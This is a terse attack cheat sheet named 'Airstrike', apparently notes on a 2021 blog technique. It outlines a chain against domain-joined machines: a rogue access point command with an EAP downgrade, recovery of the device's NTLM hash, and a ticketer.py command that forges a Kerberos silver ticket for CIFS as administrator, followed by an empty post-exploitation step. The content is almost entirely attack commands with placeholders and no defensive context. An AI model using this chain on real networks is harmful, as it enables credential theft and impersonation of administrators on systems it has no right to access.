Airstrike

https://shenaniganslabs.io/2021/04/13/Airstrike.html

Step 1 - Access Point

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap --downgrade <weakest|balanced>

Step 2 - Recovering the NTLM hash

Step 3 - Forge a silver ticket for the CIFS service on the device

ticketer.py -nthash <NTLM> -domain-sid <domain_SID> -domain <fqdn_domain> -spn cifs/<fqdn_computer_name> administrator
export KRB5CCNAME=administrator.ccache

Step 4 - Post-Exploitation